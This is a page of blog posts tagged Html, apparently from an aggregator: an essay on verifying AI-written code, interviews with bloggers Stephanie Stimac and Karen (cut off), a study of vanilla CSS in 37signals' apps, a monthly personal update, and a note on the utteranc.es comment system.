Posts in Html (20 found)
Higashi 3 days ago

AI should only run as fast as we can catch up

Recently I have spoken with two friends who have both been having fun with AI. Last month, I met with Eric, a fearless PM at a medium-sized startup who recently got into vibe coding with Gemini. After getting familiar with Gemini, Eric was genuinely amazed by how quickly AI turns a prompt into a playable web application. It served a great purpose as a first prototype to communicate ideas to designers and engineers. But Eric really wanted to skip those steps and ship it directly to prod. What he couldn’t really see was that Gemini had actually built a single-page HTML file that merely looks like a working app. Sadly, one cannot build a reliable enterprise product out of this. And there is really no effective way for Eric to catch up on these technical details and outpace the engineering team himself.
Last week, I had coffee with Daniel, a senior staff engineer who recently grew fond of AI coding and found it to be a true force multiplier. Daniel was skeptical of AI at first, but he hasn’t written a single line of code for months now. What he does is precisely prompt the AI to create new components in an existing framework (involving Kafka, Postgres, AuthN/Z, and k8s infra stuff) while adhering to certain preexisting paradigms. He spot-checks the correctness of the AI’s work and quickly spins up local deployments to verify it’s indeed working. Later, he pushes the changes through the code review process and lands those features. All without writing a single line of code, and it’s production-ready just as if he wrote it himself. To Daniel, building and shipping things fast and at scale is simpler than ever.
After speaking with Eric and Daniel, I suddenly felt that there is an overarching theme around the use of AI that we can probably extrapolate from these stories. And after pondering for a weekend, I think I can attempt to describe it now: it’s the problem of reliable engineering - how can we make AI work reliably?
With the AI superpower, one can task it to do all sorts of crazy things on the internet just by typing a few lines of prompt. AI thinks and learns faster than us; this is undeniable now. However, to make AI’s work actually useful (not only working, but reliable and trustworthy), we also need to catch up with what the AI does as quickly as possible. It’s almost like this: we need to send the AI off to learn and think as fast as possible, but we also need to catch up as soon as possible to make it all relevant. And the speed at which we catch up is critical to whether AI can help us do these tasks effectively. In Daniel’s case, he can spot-check, basically skimming through the AI’s work, and know for sure it’s doing the right thing with a few simple test steps to verify, hence his results are more reliable. Eric, on the other hand, would basically need to learn software development from the bottom up to comprehend what the AI has done, and that really doesn’t give him the edge to outpace engineering teams and ship features reliably by himself.
To generalize the problem, I think every task we do can be broken down into two parts: learning/creation and verification. Basically, doing the task and checking whether the task was done right. Interestingly, this gives us a good perspective on our relationship with AI when performing such tasks. Effort-wise:
If verification << learning/creation, one can very effectively check AI’s work and be confident about its reliability.
If verification ~= learning/creation, one spends as much time checking AI’s work as doing it. It’s not a big win; maybe AI becomes a good automation script to cut down some boilerplate.
If verification >> learning/creation, one cannot be sure about AI’s work that easily, and we are in vibe-land.
A very good example of the first category is image (and video) generation. Drawing or rendering a realistic-looking image is a crazily hard task. Have you tried to make a slide look nicer?
It will take me literally hours to center the text boxes to make it look “good”. However, you really just need to take a look at the output of Nano Banana and you can tell whether it’s a good render or a bad one based on how you feel. The verification is literally instantaneous and effortless because it’s all encoded as feelings or vibes in your brain. “Does this look right?” can probably be answered in a span of milliseconds by your visual cortex. There is also no special knowledge required - human beings have been evaluating visual images since birth; it is hardwired into our instincts. This significant cost asymmetry goes a long way toward explaining why AI image generation exploded. If we look for similar scenarios, we can probably identify other “killer” use cases of AI as well.
However, if we go down to the bottom of the spectrum, where verification becomes more intense - requiring domain knowledge, technical expertise, and industry know-how to tell whether the AI is producing slop or not - we enter a dark age of piling verification debt. More things are being created, but we are lagging behind in checking whether any of it actually works to our satisfaction. If an organization keeps vibe-coding without catching up on verification, those tasks quickly pile up as “debt” that still needs to be verified. When verification becomes the bottleneck, dangerous things can happen if we still want to move fast - we risk running unverified code with unexpected side effects that are yet to be validated. This applies to other fields too - imagine asking AI to craft a new vaccine and not wanting to wait for the FDA before using it.
I’ve come across a few blog posts that talk about Verification Debt already. I think it’s genuinely a good problem for technical leaders to keep in mind in this era. AI can only reliably run as fast as we can check its work. It’s almost like a complexity theory claim.
But I believe it needs to be the case to ensure we can harvest the exponential warp speed of AI while remaining robust and competent, as these technologies ultimately serve human beings, and we human beings need technology to be reliable and accountable, as we humans are already flaky enough ;)
This brings up the topic of Verification Engineering. I believe this can be the next big thing after Context Engineering (which was the big thing after Prompt Engineering). By cleverly rearranging tasks and using nice abstractions and frameworks, we can make verification of AI-performed tasks easier and use AI to ship more solid products to the world. No more slop. I can think of a few ideas to kick off verification engineering:
How to craft more technically precise prompts to guide AI to do things surgically, rather than vibing it.
How to train more capable technical stakeholders who can effectively verify and approve what AI has done.
How to find more tasks that are relatively easy to verify but rather hard to create.
How to push the theoretical boundaries of what we can succinctly verify (complexity theory strikes again).
I believe whoever figures out ways to effectively verify more complex tasks using human brains can gain the most benefit from the AI boom. Maybe we need to discard traditional programming languages and start programming in abstract graph-like dataflow representations, where one can easily tell whether a thing is done right or wrong regardless of its language or implementation details. Maybe our future is like the one depicted in Severance - we look at computer screens with wiggly numbers, and whatever “feels right” is the right thing to do. We can harvest these effortless, low-latency “feelings” that nature gives us to make AI do more powerful work.

Manuel Moreale 5 days ago

Stephanie Stimac

This week on the People and Blogs series we have an interview with Stephanie Stimac, whose blog can be found at blog.stephaniestimac.com. The People and Blogs series is supported by Lou Plummer and the other 127 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month.
I’m Stephanie Stimac, a product manager and designer from Seattle, WA but I currently live in a small town in England. My background is in visual and web design, and I graduated at a weird time in terms of web tech. A good portion of my final year of university was spent learning about how to build websites in Flash and when I graduated, Flash quickly became obsolete, but I had a bit of HTML and CSS knowledge which helped me advance through my career. I was doing purely design work for the first part of my career before I joined the Microsoft Edge Web Platform team, where I started doing a handful of other things that were product management and developer relations adjacent. I’ve spec’d out features, analyzed data and user flows, created content for social media, performed user research to identify developer pain points, given conference talks, the list goes on. I left Microsoft for a startup that moved me to Berlin but that was unfortunately short-lived due to the company folding rather quickly after hiring 100+ people. Now I live in England with my husband and work for Igalia, a technology consultancy, and I’m back in the Web Platform space. It’s sort of like my role at Microsoft but less product and more project focused. In between all this, I wrote a book that was published in 2023 called Design for Developers. It’s an evergreen guide to the basics of visual and UX design for web developers. I’m a collector of hobbies but my focus lately has been reading, baking, photography, printmaking and creating content. I’m a mountain biker and love to hike as well as paddle board.
I’ve also gotten into birding in the last year or so. There are so many different kinds, it’s incredible.
Depends on which blog you’re talking about! I’ve been blogging since about 2003 when I had a LiveJournal in high school. That evolved into blogging and sharing about college life on Wordpress around 2008/2009 and went through a few iterations before I landed on the name The Hermes Homestead. I no longer blog there but am in the process of starting that sort of lifestyle blogging again and am building a new site with Astro and Netlify. As for my more technical and design focused blog, I started that in 2019 about 3 years into my career at Microsoft. I wanted a space to talk about CSS, design and web browser things. This is my most visited blog, and it is attached to my personal website and portfolio though I called it “The Web Witch’s Blog” for a long time – now there’s just a cauldron with a code mark. It’s been through a few redesigns. It was very basic in terms of styling for the longest time. I’ve slowly made incremental improvements to things over the years, but this year I did a larger redesign to try and capture a bit of my witchy vibe and wanted to include more visuals, some subtle animations and view transitions.
There are a few different ways I post. I was doing monthly updates just covering things I had learned, big life events, what media I consumed in a month, books I read. I haven’t done this in a few months as I’m currently pregnant and was feeling burned out on everything. I’m sure I’ll pick those up again soon. I’ll also post about major career or life events. Other posts are inspired by things I’ve experienced, for example I’m in the process of writing about the worst onboarding experience I have ever had with a credit card and the brand’s website and app.
Nothing quite inspires me like a poor user experience, and I hope in sharing those experiences other people will be inspired to make sure whatever user experience they’re designing isn’t terrible. I’m also not afraid to share my terrible experiences working in tech, whether that’s about encountering conference lineups that are all men or finding out my book was scraped by Meta’s AI. I also write about new CSS features that web developers can use but I have to want to write about these, so they usually need to have some sort of design focus or benefit. Those are sort of the three main categories I center posts around at the moment, but generally if it fits into general life and career, I’ll write about it. When it comes to writing the actual post, I usually just write straight in VS Code in a markdown file. I try to proofread in VS Code but I need a new spelling and grammar extension as I end up missing a few mistakes that I’ll correct as soon as I see them. Recently, I’ve started copying text over to Microsoft Word just for a quick visual to catch any misspellings. Then I hit publish. I rarely have someone else look over a post unless I am writing about something I’m a little unsure about or if I’m talking about the company I work for. I don’t want to misrepresent them. Overall, my process is kind of like writing for a diary. I don’t really overthink what I’m writing about and just post it. That being said, I often come up with many ideas for things to write about, but it really depends on the type of mental space I’m in whether those get finished or not. I have a pile of started but unfinished drafts.
For writing, I usually have to be at home or in a quiet space with some music. Sometimes I can write when I’m out at the coffee shop, but it is very dependent on the coffee shop and how busy it is. Physical spaces 100% influence my creativity and just overall mood and wellbeing. I like to be in a space that inspires me, surrounded by things that inspire me.
I have a hard time focusing if there’s a mess or I’m in a space that doesn’t speak to me. I like to be surrounded by an environment that has a vibe or a point of view. I work from home so most of my work happens there. My husband and I have been in the process of slowly upgrading our home to be a space we enjoy being in. It’s been a slow process over the last two years, and we’re still making changes but it’s getting there and there are spots in our home I’m starting to love. But it’s also important to change up the scenery occasionally, so we’ll go out and work from coffee shops some mornings, otherwise I get stir crazy. I also use a combination of digital and analog tools to keep track of things. I have a bullet journal I fill out every week with my calendar and personal to-do list, and I have what I consider a digital bullet journal for all my work stuff in Notion that’s formatted nicely. I do have a digital bullet journal for personal stuff I’m also starting to use again, which is helpful when I have a lot of long-term plans in the works. For the technical blog, it’s hosted on Netlify and I’m using 11ty. The domain used to be registered with GoDaddy but I’ve been migrating all my domains over to Namecheap because I find some of GoDaddy’s practices predatory or less than user friendly. The old lifestyle blog is on Wordpress and is still hosted on GoDaddy, and I’m probably going to end up paying someone to migrate it all to Namecheap for me because my migration attempts have been headache inducing. I want to keep the blog up even if it’s not active, but I’m tired of paying an exorbitant amount just for an SSL certificate compared to other providers. I think it’s criminal GoDaddy charges you the amount they do for SSL when you get an SSL certificate for free. The new lifestyle blog will be hosted on Netlify (like most of my websites), with a Namecheap domain, and I’m building it with Astro. For the technical blog, no I wouldn’t change anything. 
It’s tied to my name and career. I’m happy with Netlify and 11ty. For the lifestyle blog, I wouldn’t use Wordpress again. It has its benefits but for the functionality I want and need, I think it’s overkill for what I personally am trying to achieve. I like having more control over the layout and design and I’m happy to be building the new one with Astro. As for the name, I only wish I had chosen something that was a bit more open instead of something that was so aligned to a specific period of my life (The Hermes Homestead). It doesn’t fit where I’m at anymore, but I feel like the new name is more open and maybe starting with a fresh slate isn’t so bad.
If I combine everything, I think it’s about $350 a year for all my blogs including URLs and hosting but I expect that to be reduced significantly once I move everything away from GoDaddy. (For reference, I just got an email from them telling me that my SSL for one of the URLs I’m letting expire won’t renew and they want £90 a year just for the SSL certificate.) On the technical blog, I do generate a little bit of revenue but not a lot. I sometimes include affiliate links, and I do run ads on the homepage, but it is one spot in the sidebar. I don’t want an intrusive experience with ads because there’s nothing I hate more than landing on a page that is so covered in ads you can’t navigate through the page (looking at all of you, food blogs). I was recently on a food blogger’s page and went to the print recipe page to try and read the instructions more easily and they had even put ads on the print page. I don’t want to replicate that experience, so I try to keep things as minimal as possible.
I really don’t mind if people are trying to monetise their content unless it’s so overwhelmingly full of ads that I can’t view the content. At the end of the day, I don’t know what a person’s situation is, and we live in a rather precarious and unstable time for many people when it comes to employment.
Monetising could help someone reach a goal more quickly or give them a little more freedom or room to breathe in their budget. I’ve been given product in exchange for writing a review and I don’t mind that kind of partnership. I think affiliate links are a great way to monetise without being intrusive. I use Carbon Ads for my technical blog and don’t mind their style because it’s very minimal. In terms of supporting other bloggers, I’ll click an affiliate link or engage with their content but I’m not currently paying anyone via Patreon or a subscription, though I have in the past.
I love Henry Desroches’ content over on henry.codes and stillness.digital. Olu Niyi-Awosusi also has a lovely blog over at olu.online and I love reading their work. Maggie Appleton’s Garden is also full of incredible writing.
If you’re a developer trying to level up your skills outside of code, my book, Design for Developers, is available on Amazon and Manning. My colleagues host an interesting podcast that covers a range of technology topics called Igalia Chats. On the more casual side of things, I’ve been vlogging and trying to improve my video editing abilities over on YouTube, typically sharing my life in England and more style focused content over there. And a final shoutout to my husband, who is constantly building absolutely wild things with CSS. He’s working on getting his blog up but for now he’s got a few links on his website.
Now that you're done reading the interview, go check the blog and subscribe to the RSS feed. If you're looking for more content, go read one of the previous 118 interviews. Make sure to also say thank you to Manton Reece and the other 127 supporters for making this series possible.

Rob Zolkos 1 weeks ago

Vanilla CSS is all you need

Back in April 2024, Jason Zimdars from 37signals published a post about modern CSS patterns in Campfire . He explained how their team builds sophisticated web applications using nothing but vanilla CSS. No Sass. No PostCSS. No build tools. The post stuck with me. Over the past year and a half, 37signals has released two more products (Writebook and Fizzy) built on the same nobuild philosophy. I wanted to know if these patterns held up. Had they evolved? I cracked open the source code for Campfire, Writebook, and Fizzy and traced the evolution of their CSS architecture. What started as curiosity became genuine surprise. These are not just consistent patterns. They are improving patterns. Each release builds on the last, adopting progressively more modern CSS features while maintaining the same nobuild philosophy. These are not hobby projects. Campfire is a real-time chat application. Writebook is a publishing platform. Fizzy is a full-featured project management tool with kanban boards, drag-and-drop, and complex state management. Combined, they represent nearly 14,000 lines of CSS across 105 files. Not a single line touches a build tool. Let me be clear: there is nothing wrong with Tailwind . It is a fantastic tool that helps developers ship products faster. The utility-first approach is pragmatic, especially for teams that struggle with CSS architecture decisions. But somewhere along the way, utility-first became the only answer. CSS has evolved dramatically. The language that once required preprocessors for variables and nesting now has: 37signals looked at this landscape and made a bet: modern CSS is powerful enough. No build step required. Three products later, that bet is paying off. Open any of these three codebases and you find the same flat structure: That is it. No subdirectories. No partials. No complex import trees. One file per concept, named exactly what it does. Zero configuration. Zero build time. Zero waiting. 
I would love to see something like this ship with new Rails applications. A simple starting structure with a handful of base files already in place. I suspect many developers reach for Tailwind not because they prefer utility classes, but because vanilla CSS offers no starting point. No buckets. No conventions. Maybe CSS needs its own omakase.
Jason’s original post explained OKLCH well. It is the perceptually uniform color space all three apps use. The short version: unlike RGB or HSL, OKLCH’s lightness value actually corresponds to perceived brightness. A 50% lightness blue looks as bright as a 50% lightness yellow. What is worth noting is how this foundation remains identical across all three apps. Dark mode becomes trivial: every color that references these primitives automatically updates. No duplication. No separate dark theme file. One media query, and the entire application transforms. Fizzy takes this further with color-mix(): one color in, four harmonious colors out. Change the card color via JavaScript, and the entire card theme updates automatically. No class swapping. No style recalculation. Just CSS doing what CSS does best.
Here is a pattern I did not expect: all three applications use ch units for horizontal spacing. Why characters? Because spacing should relate to content. A gap between words feels natural because it is literally the width of a character. As font size scales, spacing scales proportionally. This also makes their responsive breakpoints unexpectedly elegant: instead of asking “is this a tablet?”, they are asking “is there room for 100 characters of content?” It is semantic. It is content-driven. It works.
Let me address the elephant in the room. These applications absolutely use utility classes. The difference? These utilities are additive, not foundational. The core styling lives in semantic component classes. Utilities handle the exceptions: the one-off layout adjustment, the conditional visibility toggle.
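To make the ideas above concrete, here is a minimal sketch of OKLCH primitives, a dark-mode override, a derived card color, and character-based spacing. It is not taken from the Campfire, Writebook, or Fizzy source: every custom property name, class name, and numeric value below is a hypothetical chosen for illustration, and the use of color-mix() for the derived colors is an assumption about one way to get several related colors from a single input.

```css
/* Hypothetical token names and values; not copied from the 37signals codebases. */
:root {
  /* Raw OKLCH triples: lightness, chroma, hue */
  --lch-ink: 20% 0.02 250;
  --lch-canvas: 99% 0.005 250;

  /* Semantic colors built from the primitives */
  --color-ink: oklch(var(--lch-ink));
  --color-canvas: oklch(var(--lch-canvas));

  /* Character-based horizontal spacing */
  --inline-space: 1ch;
}

/* One media query swaps the primitives; everything built on them follows. */
@media (prefers-color-scheme: dark) {
  :root {
    --lch-ink: 95% 0.01 250;
    --lch-canvas: 18% 0.02 250;
  }
}

body {
  background: var(--color-canvas);
  color: var(--color-ink);
  padding-inline: calc(var(--inline-space) * 2);
}

/* One input color, several derived colors. Overriding --card-color
   (for example from an inline style set by JavaScript) re-derives the rest. */
.card {
  --card-color: oklch(55% 0.18 255);
  --card-bg: color-mix(in oklch, var(--card-color) 12%, var(--color-canvas));
  --card-border: color-mix(in oklch, var(--card-color) 40%, var(--color-canvas));
  background: var(--card-bg);
  border: 1px solid var(--card-border);
}

/* Content-driven breakpoint: is there room for 100 characters? */
@media (min-width: 100ch) {
  .sidebar { display: block; }
}
```

Because the semantic colors are declared on the same element as the primitives they reference, overriding only the primitives inside the media query is enough; no second set of color declarations is needed.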
Compare a typical Tailwind component, with its styling spelled out as utility classes in the markup, to the 37signals equivalent, where a semantic class is backed by a component stylesheet. Yes, it is more CSS. But consider what you gain in return.
If there is one CSS feature that changes everything, it is :has(). For decades, you needed JavaScript to style parents based on children. No more. Writebook uses it for a sidebar toggle with no JavaScript, Fizzy uses it for kanban column layouts, and Campfire uses it for intelligent button styling. This is CSS doing what you used to need JavaScript for. State management. Conditional rendering. Parent selection. All declarative. All in stylesheets.
What fascinated me most was watching the architecture evolve across releases. Campfire (first release) established the foundation, Writebook (second release) added modern capabilities, and Fizzy (third release) went all-in on modern CSS. You can see a team learning, experimenting, and shipping progressively more sophisticated CSS with each product. By Fizzy, they are using features many developers do not even know exist. CSS Layers solve the specificity wars that have plagued CSS since the beginning. It does not matter what order your files load. It does not matter how many classes you chain. Layers determine the winner, period.
One technique appears in all three applications that deserves special attention. Their loading spinners use no images, no SVGs, no JavaScript. Just CSS masks. In Fizzy’s implementation the keyframes live in a separate file, and the result is three dots bouncing in sequence. The spinner automatically inherits the text color. Works in any context, any theme, any color scheme. Zero additional assets. Pure CSS creativity.
The default browser <mark> element renders as a yellow highlighter. It works, but it is not particularly elegant. Fizzy takes a different approach for search result highlighting: drawing a hand-drawn circle around matched terms.
An empty element inside the highlight exists solely to provide two pseudo-elements (::before and ::after) that draw the left and right halves of the circle. The technique uses asymmetric border-radius values to create an organic, hand-drawn appearance. A blend setting makes the circle semi-transparent against the background, with a different value in dark mode for proper blending. No images. No SVGs. Just borders and border-radius creating the illusion of a hand-drawn circle.
Fizzy and Writebook both animate HTML <dialog> elements. This was notoriously difficult before. The secret is @starting-style. The dialog animates in and out using pure CSS. The @starting-style rule defines where the animation starts from when an element appears. Combined with allow-discrete transitions, you can now transition between display: none and display: block. The modal smoothly scales and fades in. The backdrop fades independently. No JavaScript animation libraries. No manually toggling classes. The browser handles it.
I am not suggesting you abandon your build tools tomorrow. But I am suggesting you reconsider your assumptions. You might not need Sass or PostCSS. Native CSS has variables, nesting, and color-mix(). The features that needed polyfills are now baseline across browsers. You might not need Tailwind for every project. Especially if your team understands CSS well enough to build a small design system. While the industry sprints toward increasingly complex toolchains, 37signals is walking calmly in the other direction. Is this approach right for everyone? No. Large teams with varying CSS skill levels might benefit from Tailwind’s guardrails. But for many projects, their approach is a reminder that simpler can be better.
Thanks to Jason Zimdars and the 37signals team for sharing their approach openly. All code examples in this post are taken from the Campfire, Writebook, and Fizzy source code. For Jason’s original deep-dive into Campfire’s CSS patterns, see Modern CSS Patterns and Techniques in Campfire.
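As a rough illustration of the dialog animation discussed above, a minimal sketch might look like the following. This is not Fizzy’s or Writebook’s code: the durations, easing, scale factor, and backdrop color are assumptions chosen for illustration, and the rules target plain dialog elements rather than any class from those codebases.

```css
/* Assumed values throughout; a sketch, not the 37signals implementation. */
dialog {
  /* Closed (exit) state */
  opacity: 0;
  transform: scale(0.95);
  transition:
    opacity 0.2s ease-out,
    transform 0.2s ease-out,
    /* Discrete properties need allow-discrete so they flip at the
       right end of the transition instead of immediately */
    overlay 0.2s ease-out allow-discrete,
    display 0.2s ease-out allow-discrete;
}

/* Open state */
dialog[open] {
  opacity: 1;
  transform: scale(1);
}

/* Where the entry transition starts from on the first rendered frame */
@starting-style {
  dialog[open] {
    opacity: 0;
    transform: scale(0.95);
  }
}

/* The backdrop fades on its own schedule */
dialog::backdrop {
  background-color: rgb(0 0 0 / 0);
  transition:
    background-color 0.2s ease-out,
    overlay 0.2s ease-out allow-discrete,
    display 0.2s ease-out allow-discrete;
}

dialog[open]::backdrop {
  background-color: rgb(0 0 0 / 0.4);
}

@starting-style {
  dialog[open]::backdrop {
    background-color: rgb(0 0 0 / 0);
  }
}
```

The @starting-style blocks come after the open-state rules because they have the same specificity; placed earlier, the open-state values would override them and the entry transition would not run.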
If you want to learn modern CSS, these three codebases are an exceptional classroom.

Native custom properties (variables)
Native nesting
Container queries
The :has() selector (finally, a parent selector)
CSS Layers for managing specificity
color-mix() for dynamic color manipulation
clamp(), min(), max() for responsive sizing without media queries

HTML stays readable. The class name tells you what something is, not how it looks.
Changes cascade. Update once, every button updates.
Variants compose. Add a variant without redefining every property.
Media queries live with components. Dark mode, hover states, and responsive behavior are co-located with the component they affect.

OKLCH colors
Custom properties for everything
Character-based spacing
Flat file organization
View Transitions API for smooth page changes
Container queries for component-level responsiveness
@starting-style for entrance animations
CSS Layers (@layer) for managing specificity
color-mix() for dynamic color derivation
Complex :has() chains replacing JavaScript state
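Two of the features listed above, cascade layers and :has(), are easier to picture with a small sketch. The layer names, class names, and colors here are hypothetical and are not taken from any of the three codebases; the point is only to show the mechanics.

```css
/* Declare the layer order once. For normal (non-!important) declarations,
   a later layer beats an earlier one regardless of selector specificity. */
@layer reset, base, components, utilities;

@layer components {
  /* High specificity, but in an earlier layer */
  .nav a.nav__link { color: blue; }

  /* Parent styled from a child's state: hide the sidebar while a
     checkbox somewhere inside the layout is checked */
  .layout:has(.sidebar-toggle:checked) .sidebar { display: none; }

  /* A button that contains an image gets icon spacing */
  .btn:has(img) {
    display: inline-flex;
    align-items: center;
    gap: 0.5ch;
  }
}

@layer utilities {
  /* Lower specificity, still wins over .nav a.nav__link: later layer */
  .txt-subtle { color: gray; }
}
```

One caveat worth keeping in mind: styles that sit outside any layer take precedence over all layered styles, so the ordering guarantee only holds for rules that are actually placed in a layer.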

fLaMEd fury 1 weeks ago

Ain't Enough To Go 'Round In This World

What’s going on, Internet? December crept up fast and suddenly it’s twenty-three days until Christmas. I’ve been enjoying getting out more and seeing live music. There’s so much more happening up here in Auckland and it has been good getting back into gigs. I started the month with Tom Scott’s Anitya show at the Civic. A week later I questioned my own sanity by going out to another gig with some wonderful friends on a Tuesday night right before flying to Sydney for the first of two work trips. Sydney was great. It was good catching up with and seeing workmates in person, but it was also mentally exhausting. Flying back to Auckland for the weekend added to the fatigue, but I liked the change of pace. I even managed to catch up with some of my cousins and aunt for dinner. Having the chance to do that on work trips is a nice bonus.
Meanwhile the house hunting and weekends of endless open homes finally came to an end. My wife viewed a place while I was in Sydney and pushed it through the offer stage. The offer was accepted conditionally before I’d even seen the house. We went unconditional a week later and only then did I walk through it for the first time. After more than sixty open homes this year, buying a place that needs work makes more sense for us than blowing our budget on something “liveable” but missing basics like linen cupboards, wardrobes, or a proper laundry. This way we get to shape it how we want. I’m excited for the new year.
While catching up and surfing the web, I came across one particular link making the rounds that claimed personal websites are dead, which I obviously disagree with and replied to. Finally, I finished up my Firefox Container configuration and shared it for anyone to try out. Let me know if you found the container setup useful. With all that going on, I still found time to watch a bunch of shows, listen to a lot of music, pick up a tonne of new records, and make a few updates around the site. Here’s November in full.
I watched a bunch of episodes on the flights back and forth from Sydney. No movies this month. What happened there? I carried on with The Chair Company, which wrapped up its first season yesterday. Such a bizarre show. No idea when the next season is coming but I’ll be sticking with it. I finished Andor season 3. What a damn good show. I’ve got Rogue One queued up to wrap up the story, even though I’ve already seen it three times. I’m still watching South Park. It’s fun, but I’m tired of the White House plot line (I’m sure Matt & Trey are too). I miss the boys just being kids. I’ll probably go back to season 1 soon to remind myself how the show has changed and evolved over the years. Some absolute classic episodes around seasons 6-7. Pluribus caught my attention and I’m working through it as episodes release. Interesting premise, and I’m enjoying watching the story unfold. On the flight I spotted the UK show Dope Girls and gave it a go. I forgot about it once I landed, but I’ll finish the remaining four episodes soon now that writing this post has reminded me. I started and finished season 2 of The Vince Staples Show. It leans into the same bizarre energy as later seasons of Atlanta. Low stakes, easy to watch, and fun. I also started Educators. Silly, very New Zealand, and perfect fifteen-minute episodes for when I don’t want to think and just want an awkward laugh.
I got through three books this month. Gabriel’s Bay by Catherine Robertson was a solid read with plenty of local flavour and a warm story. 7th Circle kept me hooked as it pushed further into the Shadow Grove universe I got into last year reading through the Madison Kate books. I’m fully here for the messy plotlines and the drama threaded between the raunchy sex scenes. I also read Atmosphere by Taylor Jenkins Reid. Her books are always epically tragic and beautiful at the same time, and this one absolutely delivered on both fronts.
Trying to decide if I want to read the rest of the 7th Circle books this month or dive into something heavier like Project Hail Mary. This month saw my usual mix of pop, hip hop, and early-2000s. Mokomokai ended up as my top artist of the month, with Olivia Rodrigo, D12, Tadpole, Eminem, and Westside Gunn all getting steady playtime. Top albums were a mix - SOUR by Olivia Rodrigo at the top, followed by Tadpole’s The Buddhafinger, Mokomokai’s latest release PONO!, and both Heels Have Eyes records from Westside Gunn. MGK’s Tickets to My Downfall also crept back into rotation with the (All Access) release of five new tracks to the original album. MGK has a gig here next year - do I want to go see him in concert? I mean I like Tickets To My Downfall but think he’s a ballbag. Dilemmas. Track of the month was “Verona” by Elemeno P, with “Kitty” by The Presidents of the United States of America (thanks to riding in the car with my son) and a few Olivia Rodrigo singles scattered through the top ten. Mokomokai showed up again with “Roof Racks”, because sometimes I’m just in the mood for something aggressive. November 2025 saw my largest vinyl haul ever. I took advantage of the 20 percent off vinyl sale at JB Hi-Fi, burned through a stack of saved vouchers, and grabbed a few special pieces elsewhere. The links are a bit of a mix this month and there’s a lot of them. Enjoy. Not a huge month for website work. I fixed up some CSS, finished rolling out categories and tags across all my posts, and cleaned up a few lingering bits of front-matter. I still need to build the individual category pages and rethink how this data is displayed on the posts index and on each post. The posts page itself needs a refresh too. I’m not loving the masonry card layout anymore. This update was brought to you by Alright by Tadpole. Hey, thanks for reading this post in your feed reader! Want to chat? Reply by email or add me on XMPP, or send a webmention. Check out the posts archive on the website. 
Tom Scott – Anitya from the gig MOKOMOKAI – PONO, WHAKAREHU, and Mokomokai all direct from their website in a special bundle which included the last remaining copies of the Mokomokai Vinyl 1st pressing in Red & Black Marble Fleetwood Mac – Rumours — JB Hi-Fi Eminem – The Slim Shady LP (Expanded Edition) — JB Hi-Fi Stellar* – Mix — JB Hi-Fi Tadpole – The Buddhafinger and The Medusa — JB Hi-Fi D12 – Devil’s Night (IVC Edition) — Interscope Vinyl Collective, orange variant with posters and D12 sticker in a beautiful, heavy gatefold sleeve The psychological cost of having an RSS feed Filip explores the anxiety that comes with writing a blog knowing it has an RSS feed. My first months in cyberspace Phil Gyford remembers the excitement and optimism of being online in 1995. Steps Towards a Web without The Internet AJ Roach imagines a web that could exist without the internet, built from small, local networks instead of centralised infrastructure. Should Your Indieweb Site Be Mobile Friendly? MKUltra.Monster experiments with making old-web design mobile-friendly without losing its classic feel. I ❤ shortcuts #3: read a random blog post Hyde shares a neat script to help randomly surf the independent web. In Praise of RSS and Controlled Feeds of Information rkert writes about why syndication still matters and how sharing content across the open web helps sites stay connected. Who’s a blog for? Cobb thinks through who a blog is really for and why writing for yourself remains the most sustainable approach. Maintaining a Music Library, Ten Years On Brian Schrader reflects on maintaining his personal music library over a decade and why owning your collection still matters. ChatGPT’s Atlas: The Browser That’s Anti-Web - Anil Dash Anil Dash argues that Atlas isn’t just an unusual browser but an anti-web tool that strips context from sites and traps users in a closed, distorted version of the internet. 
I know you don’t want them to want AI, but… - Anil Dash Anil Dash questions how we should react to Firefox adding AI features. He suggests die-hard fans need to look past the knee-jerk outrage and ask whether Firefox is actually trying to offer a safer, more privacy-minded version of tools their non-technical friends are already using. Early web memories - roundup post Winther rounds up early web memories from the recent Bear Blog Carnival - gutted I missed this as it was happening! Blogs used to be very different. Jetgirl looks back at how blogs used to work, from tight-knit communities to slower, more personal writing, and how different that feels compared to today. PicoSSG Pico is a tiny static site generator focused on simplicity, giving you a lightweight way to build plain HTML sites without a full framework. Personal blogs are back, should niche blogs be next? Disassociated writes about the return of personal blogs and why niche blogs might be the next wave as people move away from algorithmic platforms. Feeds and algorithms have freed us from personal websites Disassociated pushes back on the idea that platform feeds are “good enough,” arguing that treating Medium profiles as websites misses the point, and that personal sites still matter because they give you control rather than renting space inside someone else’s algorithm. Small Web, Big Voice Afranca writes about how the small web still carries real weight, showing that personal sites and hand-built spaces can have a bigger impact than their size suggests. How to Protect Your Privacy from ChatGPT and Other Chatbots Mozilla explains how to protect your privacy when using ChatGPT and other AI tools, focusing on data control, account settings, and reducing what these systems can collect about you.

Kix Panganiban 1 week ago

Utteranc.es is really neat

It's hard to find privacy-respecting (read: not Disqus) commenting systems out there. A couple of good ones recommended by Bear are Cusdis and Komments -- but I'm not a huge fan of either of them:

- Cusdis styling is very limited. You can only set it to dark or light mode, with no control over the specific HTML elements and styling. It's fine but I prefer something that looks a little neater.
- Komments requires manually creating a new page for every new post that you make. The idea is that wherever you want comments, you create a page in Komments and embed that page into your webpage. So you can have 1 Komments page per blog post, or even 1 Komments page for your entire blog.

Then I realized that there's a great alternative that I've used in the past: utteranc.es. Its execution is elegant: you embed a tiny JS file on your blog posts, and it will map every page to GitHub Issues in a GitHub repo. In my case, I created this repo specifically for that purpose. Neat! I'm including utteranc.es in all my blog posts moving forward. You can check out how it looks below:

Manuel Moreale 1 week ago

Karen

This week on the People and Blogs series we have an interview with Karen, whose blog can be found at chronosaur.us . Tired of RSS? Read this in your browser or sign up for the newsletter . The People and Blogs series is supported by Pete Millspaugh and the other 127 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month. Hello! My name is Karen. I work in IT support for a large company’s legal department, and am currently working on my Bachelors in Cybersecurity and Information Assurance. I live near New Orleans, Louisiana, with my husband and two dogs - Daisy, A Pembroke Welsh Corgi, and Mia, a Chihuahua. Daisy is The Most Serious Corgi ever (tm), and Mia has the personality of an old lady who chain smokes, plays Bingo every week at the rec center, and still records her soap operas on a VHS daily. My husband is an avid maker (woodworking and 3D printing, mostly), video gamer, and has an extensive collection of board games that takes up the entire back wall of our livingroom. As for me, outside of work, I’m a huge camera nerd and photographer. I love film photography, and recently learned how to develop my own negatives at home! I also do digital - I will never turn my nose up at one versus the other. I’ve always been into assorted fandoms, and used to volunteer at local sci-fi/fantasy/comic conventions up to a few years ago. I got into K-Pop back in 2022, and am now an active participant in the local New 